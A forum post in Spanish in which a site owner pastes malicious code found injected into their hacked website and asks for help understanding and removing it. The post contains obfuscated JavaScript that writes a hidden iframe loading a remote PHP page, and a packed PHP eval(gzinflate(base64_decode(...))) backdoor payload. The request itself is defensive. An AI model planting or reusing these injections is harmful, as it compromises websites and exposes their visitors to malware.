Uno de mis sitios acaba de ser pirateado porque este código se insertó en archivos y lugares aleatorios (?) dentro de los archivos.
¿Alguien entiende lo que está tratando de hacer? Agradecería cualquier cosa que pueda ayudarme a descubrir cómo se desarrolló.
Además, ¿alguna sugerencia sobre cómo evitar que vuelva a aparecer? Cada vez que lo elimino, vuelve un poco más tarde.
<!--0242d5--><script type="text/javascript" language="javascript" > p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!70!7a!74!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!70!7a!74!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!62!65!74!74!65!72!62!61!6@!6c!62!6f!6e!64!73!2e!6e!65!74!2f!56!4c!4e!53!65!63!30!31!2f!63!6e!74!2e!70!68!70!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!70!7a!74!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!70!7a!74!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!70!7a!74!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!70!7a!74!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=62;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-485!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}</script><!--/0242d5-->
----
CODE in various places and end of files
----
<?
#0242d5#
eval(gzinflate(base64_decode("5VbBcpswEL33KywOHRinNiCQnBJSz+TUc46lBwwC03EMRcRp7PG/d3eFk+Bx2k6SnuLRjKWn3bdvV1rZKlvWI2v0bj8XOmurpht1942KE6tTv7rpj3STGjixRqt0Xd6mJW4O8Mv3W7MmbtJWq6/rLtI6tj2fO1+uu7Zal5OirW+ulml7VefqsxuluvwJhfNnTAgmQyYUE5zJgIk5EwUufZfBrj/HiVywnKUEHYYUTHhM+jgHHwlEPjlLRHhOeEBcnALkTFAYiOGbYD4hHkUNWQDzjJCnlqBAEq0ge6/fBRCUcSPrWNqxHGAy0fijNGSdYQQcAAJDgUPKfqBGEmhscOIT4hFtRnMqFGQJ/GivenvgCQULMhYoFnLKhjMOUTzcgvlDGSA0yiA9fPGPmUC8eV+rnqJAHI2H5/eYqockaFOgowz7lF4e1WSPJTnU5mk8/pqEoCBYMTIwZzSg9jBjOXtNxcyNMuc6e2v2/hKL/yGc+km6f+M9wQ16+ob2/tiWsr/CJ7sx8FFOQLV76MyBamrLZ9+MgabnRWAD+ofrHPaReEYuc3x4+pQCLEKYndBhQK7QCzvu4AjI4OV4gbi3qZCid8+l5g37RyTgdPXNeZP7se9J3TInCL6QeGasEmvSqmaVZsqezqflWWKdJ5Yz0c2q6uzEYrCIuvZ+l9fZ7Y1ad5NFnd9/jN2Jt8/SLlvaZa5LnZfObruNeZQv9LJVseeLqCpss3J2m2Jzp2J3QBT1/ikSHEy8aA9ujBbOTsVqk66ivYbfn8RCwu3WKerWroCr+hS65wwn47Gzg727ap3Xd5MDv6PHsdZ2Y+MP2Lfq+5knHIfojw2VrWFjfzE1fwwuP1jRbw==")));
#/0242d5#
?>
--
(within above tags [#0242d5# and #/0242d5#] is this code -that wont show properly with just pasting here)
eval(gzinflate(base64_decode("5VbBcpswEL33KywOHRinNiCQnBJSz+TUc46lBwwC03EMRcRp7PG/d3eFk+Bx2k6SnuLRjKWn3bdvV1rZKlvWI2v0bj8XOmurpht1942KE6tTv7rpj3STGjixRqt0Xd6mJW4O8Mv3W7MmbtJWq6/rLtI6tj2fO1+uu7Zal5OirW+ulml7VefqsxuluvwJhfNnTAgmQyYUE5zJgIk5EwUufZfBrj/HiVywnKUEHYYUTHhM+jgHHwlEPjlLRHhOeEBcnALkTFAYiOGbYD4hHkUNWQDzjJCnlqBAEq0ge6/fBRCUcSPrWNqxHGAy0fijNGSdYQQcAAJDgUPKfqBGEmhscOIT4hFtRnMqFGQJ/GivenvgCQULMhYoFnLKhjMOUTzcgvlDGSA0yiA9fPGPmUC8eV+rnqJAHI2H5/eYqockaFOgowz7lF4e1WSPJTnU5mk8/pqEoCBYMTIwZzSg9jBjOXtNxcyNMuc6e2v2/hKL/yGc+km6f+M9wQ16+ob2/tiWsr/CJ7sx8FFOQLV76MyBamrLZ9+MgabnRWAD+ofrHPaReEYuc3x4+pQCLEKYndBhQK7QCzvu4AjI4OV4gbi3qZCid8+l5g37RyTgdPXNeZP7se9J3TInCL6QeGasEmvSqmaVZsqezqflWWKdJ5Yz0c2q6uzEYrCIuvZ+l9fZ7Y1ad5NFnd9/jN2Jt8/SLlvaZa5LnZfObruNeZQv9LJVseeLqCpss3J2m2Jzp2J3QBT1/ikSHEy8aA9ujBbOTsVqk66ivYbfn8RCwu3WKerWroCr+hS65wwn47Gzg727ap3Xd5MDv6PHsdZ2Y+MP2Lfq+5knHIfojw2VrWFjfzE1fwwuP1jRbw==")));